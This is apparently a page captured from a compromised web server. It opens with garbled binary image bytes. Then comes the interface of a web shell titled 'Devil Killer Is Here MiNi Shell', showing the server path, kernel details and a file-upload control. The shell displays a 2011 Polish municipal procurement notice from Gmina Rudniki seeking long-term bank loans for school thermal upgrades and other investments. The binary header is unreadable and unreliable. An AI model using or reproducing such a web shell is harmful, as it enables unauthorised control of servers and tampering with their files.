JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110420/86152-N-2011.html

<p class="kh_header"><b>Rudniki: Kredyty długoterminowe na zadania inwestycyjne</b><br>
<b>Numer ogłoszenia: 86152 - 2011; data zamieszczenia: 20.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rudniki , ul. Wojska Polskiego 12, 46-325 Rudniki, woj. opolskie, tel. 034 35-95-072, faks 034 3595013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rudniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kredyty długoterminowe na zadania inwestycyjne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje udzielenie i obsługę długoterminowych kredytów bankowych na zadania inwestycyjne planowane do realizacji przez Gminę Rudniki.

Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę w formie pisemnej na całość zadania (zadanie 1 i 2; z wyliczeniem kosztu oferty dla każdego zadania oddzielnie) lub tylko na jedno zadanie tj. Nr 1 lub Nr 2.
Wybór najkorzystniejszej oferty zostanie dokonany dla każdego zadania odrębnie.
A - Przedmiot przetargu
I część: OR 272.PN 8.2011.  zadanie nr 1

Obejmuje kredyty długoterminowe na przedsięwzięcia termomodernizacyjne do wysokości 2 370 000 zł z okresem ich spłaty wraz z odsetkami do dnia 
13 czerwca 2018 r.
W zakresie przedmiotowego zadania wchodzą następujące inwestycje:
1. Termomodernizacja Szkoły Podstawowej w Jaworznie planowana wartość kredytu do 
    kwoty 1 800 000 zł.  (adres miejsca inwestycji: Mirowszczyzna 43, 46-325 Rudniki),
2. Termomodernizacja Szkoły Podstawowej w Żytniowie planowana wartość kredytu do 
    kwoty 570 000 zł.  (adres miejsca inwestycji: Żytniów 29, 46-325 Rudniki).
Oprócz aspektu kredytowego dodatkowym celem dla Gminy jest uzyskanie premii termomodernizacyjnej dla powyższych przedsięwzięć inwestycyjnych.
Informujemy, że posiadamy dla poszczególnych inwestycji opracowane audyty energetyczne, które przekażemy wraz z uzupełniającymi dokumentami - w momencie podpisania umów kredytowych - oferentowi wybranemu w drodze przetargu.

II część: OR 272.PN 8.2011. zadanie nr 2

Obejmuje kredyty długoterminowe na przedsięwzięcia inwestycyjne do wysokości 
1 200 000 zł z okresem ich spłaty wraz z odsetkami do dnia 13 czerwca 2018r.
W zakres przedmiotowego zadania wchodzą następujące inwestycje:
1. Przebudowa budynku biblioteki w Rudnikach na muzeum osobliwości przyrodniczych 
    i punkt informacji turystycznej - planowana wartości kredytu do kwoty 600 000 zł,
2. Budowa boiska o sztucznej nawierzchni w ramach programu  Orlik 2012  -  
    planowana  wartości kredytu do kwoty 600 000 zł.

B - Niektóre elementy, które musi spełniać oferta i umowa kredytowa - dotyczące 
       każdego przedsięwzięcia

1. Okres kredytowania:
    Od momentu uruchomienia (części lub całości kredytu) do dnia 13.06. 2018 r.
(Końcowa spłata kredytów najpóźniej 01.06.2018r., natomiast płatność końcowych 
     odsetek do 13.06.2018r.)
2. Zabezpieczenie spłat kredytu:
   Weksel własny in blanco wystawiony przez kredytobiorcę wraz z deklaracją wekslową.
3. Uruchomienie kredytu :
  a) środki zostaną postawione do dyspozycji kredytobiorcy w ciągu 30 dni od dnia  
      podpisania umowy z możliwością ich wykorzystania do dnia 30.12.2011 r.
  b) każdorazowo na podstawie dyspozycji uruchomienia wystawionej przez 
      kredytobiorcę realizowanej w ciężar rachunku kredytowego.
4. Oprocentowanie kredytu :
  a) stanowić będzie suma stawki referencyjnej - WIBOR 3 M (zmienna) i marża banku 
     (stała). 
    Stawka referencyjna WIBOR 3M będzie liczona jako średnia wielkość notowań z 
    całego miesiąca publikowana na stronie internetowej www.money.pl
    Marże banku winny pokrywać koszty, opłaty, itp. związane z bieżącą obsługą   
    kredytową i zysk wykonawcy
 b) do naliczania odsetek za dany miesiąc (kalendarzowy) korzystania z kredytu stosuje 
     się stawkę referencyjną z miesiąca poprzedniego.
     Odsetki liczone będą za dni korzystania z kredytu w danym miesiącu kalendarzowym
5. Okres odsetkowy i spłata odsetek: 
 a) okres odsetkowy: 1 - miesięczny (kalendarzowy)
 b) rata odsetkowa płatna jest do 12 dnia następnego miesiąca za miesiąc poprzedni pod 
     warunkiem przesłania Kredytobiorcy przez Bank stosownego wyliczenia odsetek. 
     Przesłanie wyliczenia nastąpi najpóźniej na 5 dni przed terminem płatności. 
     W przypadku niedotrzymania przez Bank terminu doręczenia wyliczenia odsetek (na 
      5 dni przed terminem płatności) wtedy termin ich płatności nastąpi w ciągu 5 dni od 
     daty doręczenia wyliczenia.
    Wyliczenie odsetek powinno pokazywać w sposób szczegółowy sposób ich  
    wyliczenia tj. kwotę wykorzystanego kredytu, za jaką liczbę dni, zastosowaną stopę 
    procentową, itp
 c) odsetki będą wnoszone przez Kredytobiorcę na rachunek wskazany w umowie 
     kredytowej.
 d) przy naliczeniu odsetek Bank przyjmuje, że miesiąc ma rzeczywistą liczbę dni 
     kalendarzowych, a rok 365 dni
e) odsetki przeterminowane naliczane będą w wysokości 150 % odsetek ustawowych
6. Spłata kredytu :
 a)  w 14 ratach półrocznych; z tego: 
     - I rata               	- płatna 1 grudnia 2011 r.,
     - następne 12 rat	- płatne w ratach 1 czerwca  
                                      i 1 grudnia każdego roku,
    - ostatnia rata	- płatna 1 czerwca 2018 r.
   Harmonogram spłat rat poszczególnych kredytów przedstawia załącznik Nr 1 do  
   specyfikacji.
 b) w przypadku uruchomienia części lub całości kredytu w m-cu grudniu 2011 r. spłata 
     kredytu nastąpi w 13 ratach. Przeliczenie rat nastąpi na wniosek kredytobiorcy przy 
     czym okres spłaty kredytu pozostaje bez zmian.
 c) w przypadku wykorzystania kredytu w zmniejszonej wysokości raty spłaty kredytu na
     wniosek kredytobiorcy zostaną ustalone w nowej wysokości.
 d) raty wnoszone będą na rachunek wskazany w umowie kredytowej.  
     Za datę spłaty uważa się datę wpływu środków na ten rachunek. W przypadku, gdy 
     termin spłaty kredytu określony wyżej upływa w dniu wolnym od pracy uważa się, że
     termin został zachowany jeżeli spłata kredytu nastąpiła w pierwszym dniu roboczym 
     po tej dacie. 
7. Inne postanowienia :
 a) kredytobiorca ma prawo rezygnacji z części i całości udzielonego kredytu bez 
    ponoszenia dodatkowych kosztów
b) kredytobiorca ma prawo wcześniejszej spłaty części lub całości kredytu bez  
     ponoszenia dodatkowych kosztów.
c) w przypadku wcześniejszej spłaty poszczególnych rat bądź części kredytu każda 
    wpłata powoduje zmniejszenie zadłużenie pod datą ich wpływu do Banku.
    Odsetki należne bankowi w przypadku końcowej spłaty będą płatne w ciągu 12 dni od 
     daty spłaty całości kredytu. Przesłane przez bank wyliczenie tych odsetek nastąpi 
     najpóźniej na 5 dni przed terminem ich płatności. Ostateczny termin spłaty  kredytu 
     wraz z odsetkami nie może przekroczyć  daty określonej w umowie kredytowej.
d)  odsetki będą naliczone od wielkości wykorzystanego kredytu a nie od postawionego
     do dyspozycji Kredytobiorcy.
e)	kredytobiorca nie będzie ponosił żadnych dodatkowych prowizji i opłat z tytułu 
      realizacji przedmiotowych umów kredytowych poza kosztami odsetkowymi oraz 
      ewentualnymi kosztami windykacyjnymi i egzekucyjnymi.
          Wyjątek stanowi tylko prowizja na rzecz Banku Gospodarstwa Krajowego 
           (dotyczy to kredytów w ramach przedsięwzięć termomodernizacyjna 
          wchodzących w skład zadania Nr 1 niniejszej specyfikacji) naliczana przy 
           przyznawaniu premii termomodernizacyjnej.
Warunki wykorzystania i spłaty kredytu oraz inne uszczegółowienia związane z tym przedmiotem zostały ujęte w projektach umów kredytowych przedstawione w załączeniu, z tym że:
 a) projekt umowy przedstawiony w załączniku Nr 2 dotyczy kredytów z zakresu 
     przedsięwzięć termomodernizacyjnych wchodzących w skład zadania Nr 1,
 b) projekt umowy przedstawiony w załączniku Nr 3 dotyczy kredytów wchodzących w 
     skład zadania Nr 2.
Wzory umów stanowią integralną część specyfikacji. 
Wzory weksla oraz deklaracji wekslowych przedstawia odpowiednio zał. nr 4 i 5


C - Materiały załączone do specyfikacji celem wstępnego zbadania zdolności kredytowej 
       zamawiającego oraz inne dokumenty; jak również informacje uzupełniające 
       i oświadczenia zamawiającego.

1. Materiały do oceny zdolności kredytowej

Sprawozdania roczne za 2009 i 2010r.:
 - Rb - 27 s (zbiorcze) o dochodach
- Rb - 28 s (zbiorcze) o wydatkach
- Rb - NDS o nadwyżce/deficycie
- Rb - N o należnościach
- Rb - Z o zobowiązaniach 
- Rb - UZ uzupełniające o zobowiązaniach
- Rb - PDP z wykonania dochodów podatkowych 
- z wykonania budżetu wraz z opinią RIO za 2009 r.
2. Inne materiały:
- projekt uchwały budżetowej i uchwałę budżetową na 2011r.,
- opinie RIO: o projekcie budżetu na 2011 r., w sprawie możliwości sfinansowania 
  deficytu budżetowego, w sprawie wieloletniej prognozy finansowej i prawidłowości
   prognozy kwoty długu oraz prawidłowości planowanej kwoty długu.
- uchwała w sprawie wieloletniej prognozy finansowej i prognozy kwoty długu 
  (Nr III/16/10 z dnia 28 grudnia 2010 r.),
- wieloletnia prognoza finansowa i prognoza kwoty długu wg. ostatecznych danych 
  sprawozdawczych za 2010 r. (w tym: prognoza roku 2011r. wg. stanu na dzień 
  31.03.2011r.),
- przepływy pieniężne w latach 2009 - 2010 oraz ich prognoza na lata 2011 - 2022r. 
  (prognoza roku 2011 wg stanu na dzień 31.03.2011r),
- informacja o zaciągniętych kredytach i pożyczkach oraz prognozowane ich 
  zaciąganie w latach 2011 -2013.
- 4 szt. uchwał Rady Gminy w sprawie zaciągnięć w 2011 r. kredytów na 
   poszczególne przedsięwzięcia objęte niniejszą specyfikacją,
- opinia RIO o możliwości spłaty kredytu.
3. Informacje i oświadczenia:
 1) na dotychczasowe zadłużenie kredytowe gminy wynoszące na koniec ubr. kwotę 
      2 172 tyś. zł składają się zobowiązania wobec:
        - Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Opolu 
          w kwocie 321 tyś. zł, 
       - Banku Gospodarstwa Krajowego Oddział w Opolu w kwocie 699 tyś. zł.
       - ING Banku Śląskiego SA. Oddział w Krapkowicach w kwocie 1 152 tyś. zł.
     Oświadczamy, że nie zalegamy i nigdy nie zalegaliśmy ze spłatą zobowiązań 
      wobec banków i instytucji finansowanych na przestrzeni ostatnich lat licząc od 
      powstania samorządności w n/kraju.
 2) oświadczamy, że nigdy nie zalegaliśmy ze zobowiązaniami wobec Urzędu 
      Skarbowego, ZUS, itp. (w tym samym okresie jw.)
3) informujemy, że inne dokumenty wymagane przez banki jak np. zaświadczenie o 
     wyborze wójta, uchwałę o powołaniu skarbnika, zaświadczenia o nadaniu Nr Regon
       i NIP, itp. przedstawimy wybranemu w przetargu  oferentowi w momencie 
       podpisywania umów kredytowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.06.2018.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu nie jest wymagane składanie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności tj. są osobami prawnymi utworzonymi zgodnie z przepisami ustaw, działającymi na podstawie zezwoleń uprawniających do wykonywania czynności bankowych obciążających ryzykiem środki powierzone pod jakimkolwiek tytułem zwrotnym, wypełniającymi tym samym warunki definicji Banku zawartej w art. 2 ustawy z dnia 29 sierpnia 1997r. Prawo bankowe ( dz. U. z 2002r. Nr 72, poz. 665 z późń. zm.). Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia, na podstawie w/w dokumentów i oświadczenia o  spełnieniu warunków  udziału w postępowaniu złożonego przez Wykonawcę wg załącznika Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia, na podstawie oświadczenia  o spełnieniu warunków udziału w postępowaniu złożonego przez Wykonawcę wg. załącznika Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia, na podstawie oświadczenia  o spełnieniu warunków udziału w postępowaniu złożonego przez Wykonawcę wg. załącznika Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia, na podstawie oświadczenia  o spełnieniu warunków udziału w postępowaniu złożonego przez Wykonawcę wg. załącznika Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia, na podstawie oświadczenia  o spełnieniu warunków udziału w postępowaniu złożonego przez Wykonawcę wg. załącznika Nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Bank państwowy utworzony na podstawie ustawy Prawo bankowe- rozporządzenie Ministra Skarbu Państwa w sprawie nadania statutu Banku aktualny skład zarządu wraz z dokumentami powołującymi poszczególnych członków; bank powołany na podstawie kodeksu spółek handlowych i ustawy Prawo bankowe - dołączyć dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania owej oferty, np. aktualny odpis z właściwego rejestru, aktualny statut spółki. Wymagane dokumenty można złożyć w formie kopii poświadczonej z oryginałem przez wykonawcę .
Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu, o którym mowa wyżej wtedy do oferty należy dołączyć także pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie.

b) Wypełniony druk -Oferta , stanowiący załącznik nr 9 do niniejszej specyfikacji. 
   
c) oświadczenie o spełnieniu warunków udziału w postępowaniu - wypełniony załącznik  Nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rudniki 
46-325 Rudniki
ul. Wojska Polskiego 12
pokój Nr 2 - parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2011 godzina 09:00, miejsce: Urząd Gminy Rudniki
46-325 Rudniki
ul. Wojska Polskiego 12
Sekretariat - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> OR 272.PN 8.2011. zadanie nr 1
Kredyty długoterminowe na zadania inwestycyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmuje kredyty długoterminowe na przedsięwzięcia termomodernizacyjne do wysokości 2 370 000 zł z okresem ich spłaty wraz z odsetkami do dnia 
13 czerwca 2018 r.
W zakresie przedmiotowego zadania wchodzą następujące inwestycje:
1. Termomodernizacja Szkoły Podstawowej w Jaworznie planowana wartość kredytu do 
    kwoty 1 800 000 zł.  (adres miejsca inwestycji: Mirowszczyzna 43, 46-325 Rudniki),
2. Termomodernizacja Szkoły Podstawowej w Żytniowie planowana wartość kredytu do 
    kwoty 570 000 zł.  (adres miejsca inwestycji: Żytniów 29, 46-325 Rudniki).
Oprócz aspektu kredytowego dodatkowym celem dla Gminy jest uzyskanie premii termomodernizacyjnej dla powyższych przedsięwzięć inwestycyjnych.
Informujemy, że posiadamy dla poszczególnych inwestycji opracowane audyty energetyczne, które przekażemy wraz z uzupełniającymi dokumentami - w momencie podpisania umów kredytowych - oferentowi wybranemu w drodze przetargu..</p></li>
